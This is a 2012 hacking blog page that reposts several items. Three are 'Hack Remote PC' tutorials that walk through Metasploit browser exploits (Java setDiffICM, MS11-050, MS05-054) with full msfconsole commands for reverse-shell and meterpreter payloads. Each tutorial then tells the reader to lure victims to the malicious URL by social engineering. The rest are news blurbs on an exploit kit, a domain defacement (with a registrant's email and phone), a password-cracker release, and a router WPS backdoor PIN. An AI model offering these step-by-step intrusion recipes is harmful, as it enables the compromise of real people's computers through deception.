Saturday, May 12, 2012

RedKit Exploit Kit : New web malware exploitation pack

5:57 AM  , , ,  No comments

Posted by THN Reporter On 5/06/2012 09:31:00 AM

Share This news with your friends on Facebook/Twitter/Forums

RedKit Exploit Kit : New web malware exploitation pack : The Hacker News ~ http://thehackernews.com/2012/05/redkit-exploit-kit-new-web-malware.html
If you enjoyed The Hacker News, Make sure you subscribe to our RSS feed. Stay Updated about latest Security threats, Hacking threads & IT Issues from all over the world.!The content of This News RedKit Exploit Kit : New web malware exploitation pack and Other Information is provided by Various Sources (Emails, Messages, etc..) for Educational Purpose & Security Awareness only. Please Feel free to Contact Us. Thank You !

View the original article here

Read More

Hack Remote PC with Sun Java JRE AWT setDiffICM Buffer Overflow

2:18 AM  , , ,  No comments

This module exploits a flaw in the setDiffICM function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Java 6 update 16

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

1 Hack Remote PC with Sun Java JRE AWT setDiffICM Buffer Overflow

Now type use exploit/windows/browser/java_setdifficm_bof

Msf exploit (java_setdifficm_bof)>set payload generic/shell_reverse_tcp

Msf exploit (java_setdifficm_bof)>set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (java_setdifficm_bof)>set srvhost 192.168.1.2 (This must be an address on the local machine)

Msf exploit (java_setdifficm_bof)>set uripath rulebook (The Url to use for this exploit)

Msf exploit (java_setdifficm_bof)>exploit

2 Hack Remote PC with Sun Java JRE AWT setDiffICM Buffer Overflow

Now an URL you should give to your victim http://192.168.1.2:8080/rulebook

3 Hack Remote PC with Sun Java JRE AWT setDiffICM Buffer Overflow

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

4 Hack Remote PC with Sun Java JRE AWT setDiffICM Buffer Overflow

pixel Hack Remote PC with Sun Java JRE AWT setDiffICM Buffer Overflow

View the original article here

Read More

Friday, May 11, 2012

How to Hack Remote Windows 7 PC

10:38 PM  ,  No comments

This module exploits a use-after-free vulnerability in Internet Explorer. The vulnerability occurs when an invalid tag exists and other elements overlap/cover where the object tag should be when rendered (due to their styles/positioning). The mshtml! CObject Element is then freed from memory because it is invalid. However, the mshtml! CDisplay object for the page continues to keep a reference to the freed and attempts to call a function on it, leading to the use-after-free. Please note that for IE 8 targets, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention).

Internet Explorer 7 on XP SP3

Internet Explorer 7 on Windows Vista

Internet Explorer 8 on XP SP3

 Internet Explorer 8 on Windows 7

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

1 How to Hack Remote Windows 7 PC

Now type use exploit/windows/browser/ms11_050_mshtml_cobjectelement

Msf exploit (ms11_050_mshtml_cobjectelement)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms11_050_mshtml_cobjectelement)>set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (ms11_050_mshtml_cobjectelement)>set srvhost 192.168.1.2 (This must be an address on the local machine)

Msf exploit (ms11_050_mshtml_cobjectelement) set uripath win7tricks (The Url to use for this exploit)

Msf exploit (ms11_050_mshtml_cobjectelement)>exploit

2 How to Hack Remote Windows 7 PC

Now an URL you should give to your victim http://192.168.1.2:8080/win7tricks

3 How to Hack Remote Windows 7 PC

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

4 How to Hack Remote Windows 7 PC

pixel How to Hack Remote Windows 7 PC

View the original article here

Read More

Hack Windows XP in LAN with JavaScript OnLoad Handler Remote Code Execution

8:05 PM  , , , , ,  No comments

This bug is triggered when the browser handles a JavaScript ‘onLoad’ handler in conjunction with an improperly initialized ‘window ()’ JavaScript function. This exploit results in a call to an address lower than the heap. The JavaScript prompt () places our shellcode near where the call operand points to. We call prompt () multiple times in separate iframes to place our return address. We hide the prompts in a popup window behind the main window. We spray the heap a second time with our shellcode and point the return address to the heap. I use a fairly high address to make this exploit more reliable. IE will crash when the exploit completes. Also, please note that Internet Explorer must allow popups in order to continue exploitation.

Internet Explorer 5, 6

Windows XP SP2

Windows XP SP3

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

1 Hack Windows XP in LAN with JavaScript OnLoad Handler Remote Code Execution

Now type use exploit/windows/browser/ms05_054_onload

Msf exploit (ms05_054_onload)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms05_054_onload)>set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (ms05_054_onload)>set srvhost 192.168.1.2 (This must be an address on the local machine)

Msf exploit (ms05_054_onload)>set uripath onload (The Url to use for this exploit)

Msf exploit (ms05_054_onload)>exploit

2 Hack Windows XP in LAN with JavaScript OnLoad Handler Remote Code Execution

Now an URL you should give to your victim http://192.168.1.2:8080/onload

3 Hack Windows XP in LAN with JavaScript OnLoad Handler Remote Code Execution

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

4 Hack Windows XP in LAN with JavaScript OnLoad Handler Remote Code Execution

pixel Hack Windows XP in LAN with JavaScript OnLoad Handler Remote Code Execution

View the original article here

Read More

Fake Google Iranian domain defaced by Algerian Script Kiddies

5:34 PM  , , , , , ,  No comments

Posted by THN Reporter On 5/04/2012 07:16:00 AM

Google got Pwned ? NO Few Algerian Script Kiddies try to spread fake rumours that they Hack and Deface the Giant Search engine "Google Iranian" domain http://www.google.co.ir/ . As the above screenshot shown a Algerian flag on it and Page Titles : "H4Ck3D By vaga-hacker dz and DR.KIM".As mentioned by hacker, the team include hackers named : "V4Ga-Dz,Dz0ne,DR-KIM King-Dz,BroX0 aghilass elite jrojan password kha&mix wasim -dz" . It is not confirmed that, either these are member from some Anonymous Hackers but they try to use Anonymous Hackers Tag line : We Dont Forget , We Dont Forgive, Expect Us!  to get some publicity.

According to further investigation by "The Hacker News" Technical Team, we found that "google.co.ir" possibly not belongs to GOOGLE because site rank is "3141379"  , that means the site should have less than 100 Visitors/Day approx. Also we check WHO.IS records of this domain and found that Domain Holder is "Ganjineh ofogh omid gostar laleh eshragh" which is registered using a Google mail "sellinform110@gmail.com" and Phone No. is : 09377705008 .

May be some Readers are thinking that Hacking a Google domain is not possible, so here we have something for you from past, last year Google Bangladesh website (Google.com.bd) was also Hacked by TiGER-M@TE using DNS hijacking method.


Share This news with your friends on Facebook/Twitter/Forums

Fake Google Iranian domain defaced by Algerian Script Kiddies : The Hacker News ~ http://thehackernews.com/2012/05/google-iraq-defaced-by-anonymous.html
If you enjoyed The Hacker News, Make sure you subscribe to our RSS feed. Stay Updated about latest Security threats, Hacking threads & IT Issues from all over the world.!The content of This News Fake Google Iranian domain defaced by Algerian Script Kiddies and Other Information is provided by Various Sources (Emails, Messages, etc..) for Educational Purpose & Security Awareness only. Please Feel free to Contact Us. Thank You !

View the original article here

Read More

oclHashcat-plus v0.08 Released - fastest password Cracker

2:16 PM  , , , ,  No comments

Posted by THN Reporter On 5/02/2012 10:38:00 AM oclHashcat-plus v0.08 Released - fastest password Cracker

oclHashcat-plus is Worlds first and only GPGPU based rule engine and Worlds fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker.


Features
FreeMulti-GPU (up to 16 gpus)Multi-Hash (up to 24 million hashes)Multi-OS (Linux & Windows native binaries)Multi-Platform (OpenCL & CUDA support)Multi-Algo (see below)Low resource utilization, you can still watch movies or play games while crackingFocuses highly iterated, modern hashesFocuses single dictionary based attacksSupports pause / resume while crackingSupports reading words from fileSupports reading words from stdinIntegrated thermal watchdog20+ Algorithms implemented with performance in mind... and much more
Algorithms
MD5JoomlaosCommerce, xt:CommerceSHA1SHA-1(Base64), nsldap, Netscape LDAP SHASSHA-1(Base64), nsldaps, Netscape LDAP SSHAOracle 11gSMF > v1.1OSX v10.4, v10.5, v10.6MSSQL(2000)MSSQL(2005)MySQLphpass, MD5(Wordpress), MD5(phpBB3)md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5MD4NTLMDCC, mscashSHA256descrypt, DES(Unix), Traditional DESmd5apr1, MD5(APR), Apache MD5SHA512OSX v10.7DCC2, mscash2Cisco-PIX MD5WPA/WPA2Double MD5vBulletin < v3.8.5 vBulletin > v3.8.5IPB2+, MyBB1.2+LMOracle 7-10g

Share This news with your friends on Facebook/Twitter/Forums

oclHashcat-plus v0.08 Released - fastest password Cracker : The Hacker News ~ http://thehackernews.com/2012/05/oclhashcat-plus-v008-released-fastest.html
If you enjoyed The Hacker News, Make sure you subscribe to our RSS feed. Stay Updated about latest Security threats, Hacking threads & IT Issues from all over the world.!The content of This News oclHashcat-plus v0.08 Released - fastest password Cracker and Other Information is provided by Various Sources (Emails, Messages, etc..) for Educational Purpose & Security Awareness only. Please Feel free to Contact Us. Thank You !

View the original article here

Read More

More than 100000 Wireless Routers have Default Backdoor

11:01 AM  , , , ,  No comments

Posted by THN Reporter On 4/27/2012 10:44:00 AM
A recently reported flaw that allowed an attacker to drastically reduce the number of attempts needed to guess the WPS PIN of a wireless router isn't necessary for some Arcadyan based routers anymore.Last year it was exposed that the WiFi Protected Setup (WPS) PIN is susceptible to a brute force attack. A design flaw that exists in the WPS specification for the PIN authentication significantly reduces the time required to brute force the entire PIN because it allows an attacker to know when the first half of the 8 digit PIN is correct.The lack of a proper lock out policy after a certain number of failed attempts to guess the PIN on many wireless routers makes this brute force attack that much more feasible.Some 100,000 routers of type Speedport W921V, W504V and W723V are affected in Germany alone. What makes things worse is the fact that in order to exploit the backdoor, no button has to be pushed on the device itself and on some of the affected routers, the backdoor PIN ("12345670") is still working even after WPS has been disabled by the user. The only currently known remedy for those models is to disable Wi-Fi altogether. Since all Arcadyan routers share the same software platform, more models might be affected.Last year, Tactical Network Solutions develop and released Reaver , which is a WPA attack tool  that exploits a protocol design flaw in WiFi Protected Setup (WPS). Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP.

Share This news with your friends on Facebook/Twitter/Forums

More than 100000 Wireless Routers have Default Backdoor : The Hacker News ~ http://thehackernews.com/2012/04/more-than-100000-wireless-routers-have.html
If you enjoyed The Hacker News, Make sure you subscribe to our RSS feed. Stay Updated about latest Security threats, Hacking threads & IT Issues from all over the world.!The content of This News More than 100000 Wireless Routers have Default Backdoor and Other Information is provided by Various Sources (Emails, Messages, etc..) for Educational Purpose & Security Awareness only. Please Feel free to Contact Us. Thank You !

View the original article here

Read More
Subscribe to: Posts (Atom)